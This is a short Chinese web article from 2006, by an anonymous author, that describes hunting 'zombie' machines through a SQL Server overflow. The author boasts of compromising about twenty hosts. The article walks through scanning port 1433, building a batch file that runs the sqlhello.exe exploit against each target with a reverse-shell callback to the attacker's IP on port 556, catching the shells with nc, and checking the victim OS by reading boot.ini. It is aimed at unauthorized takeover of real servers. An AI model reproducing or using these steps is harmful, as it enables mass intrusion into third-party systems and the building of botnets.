SQL Server溢出猎捕肉鸡新方法

王朝mssql·作者佚名  2006-11-24
窄屏简体版  字體: |||超大  

我今天用这个方法拿到了近20台肉鸡。呵!!

要用到几个工具!!

nc.exe

sqlhello.exe

代理猎手!!

先用代理猎手扫1433端口!这个大家应该会吧。玩QB的时候可以说是……呵。

扫到后整理。导出。 替换为溢出的格式!!比如我扫到了。

192.168.0.1:1433

溢出的格式就是: sqlhello.exe 192.168.0.1 1433本机IP(公网的) 556

保存为bat文件。

先在公网的机子上监听一个端口如556

现在运行那个bat文件!

呵!!看着有没有shell返回。

我试过不到两分钟就返回了一个。

这时候你先ctrl+c停下那个bat 的运行。

查看一下。那个shell的系统再说!

type c:\boot.ini

如果是2003服务器版的。

呵。。

很快的就成为我们的肉鸡了!

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有 導航